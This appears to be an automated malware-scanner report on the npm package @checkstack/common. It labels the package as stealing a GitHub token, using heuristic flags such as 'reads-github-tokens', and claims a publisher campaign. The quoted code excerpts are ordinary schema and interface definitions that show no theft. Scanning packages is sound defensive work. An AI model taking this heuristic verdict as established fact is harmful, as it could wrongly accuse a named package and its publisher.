// npm 패키지
@checkstack/common
버전
23
메인테이너
1
라이선스
Elastic-2.0
최초 publish
2026-01-09
publisher
enyineer
tarball
114,069 B
AUTO-PUBLISHED·2개 버전 인덱싱됨·최근 publish: 2026-06-07
// exfil path
what is read → where it shipssteals
- ● GitHub PAT
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
→ view full payload// publisher 캠페인by enyineer
이 계정에서 catch된 패키지 2건고립된 catch가 아닙니다. 동일 publisher가 1개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @0.15.0· 2 files flagged
- @0.15.0··AUTO-PUBLISHED·publisher: enyineerheuristic 64/100static flags 2llm skippednew-publisher:25dmature-packagepublisher-multi-name-burst:79publisher-version-pump:103reads-github-tokenschild-process-spawn
// offending code· 2 files flaggedpatterns: 2
--- package/src/plugin-source.ts (excerpt) --- import { z } from "zod"; // ───────────────────────────────────────────────────────────────────────────── // PluginSource — discriminated union describing where a plugin came from. // One installer per `type`. Persisted on the `plugins` row so fresh-instance // bootstrap and reinstall can recreate the artifact from the same source. // // Lives in `@checkstack/common` (not `backend-api`) so it can be referenced // from contracts (which must remain importable from frontend & common // packages). // ───────────────────────────────────────────────────────────────────────────── export const npmPluginSourceSchema = z.object({ type: z.literal("npm"), packageName: z.string().min(1), version: z.string().optional(), registry: z.string().url().optional(), }); export type NpmPluginSource = z.infer<typeof npmPluginSourceSchema>; export const tarballPluginSourceSchema = z.object({ type: z.literal("tarball"), /** * The plugin_artifacts row id. The tarball bytes themselves live in * Postgres — only the artifact reference is stored on the `plugins` row. * On fresh-instance bootstrap, this is what's used to re-fetch the bytes. */ artifactId: z.string().min(1), /** Original filename for display in the UI. */ filename: z.string().optional(), }); export type TarballPluginSource = z.infer<typeof tarballPluginSourceSchema>; export const githubPluginSourceSchema = z.object({ type: z.literal("github"), owner: z.string().min(1), repo: z.string().min(1), tag: z --- package/src/transport-client.ts (excerpt) --- /** * Generic transport client interface for remote command execution. * * Transport strategies (SSH, SNMP, WinRM) implement this interface to provide * a consistent abstraction for collectors. * * @template TCommand - Command type (e.g., string for SSH, OidRequest for SNMP) * @template TResult - Result type (e.g., { stdout, stderr, exitCode } for SSH) */ export interface TransportClient<TCommand, TResult> { /** * Execute a command on the remote host. * The command and result types are defined by the transport implementation. */ exec(command: TCommand): Promise<TResult>; }
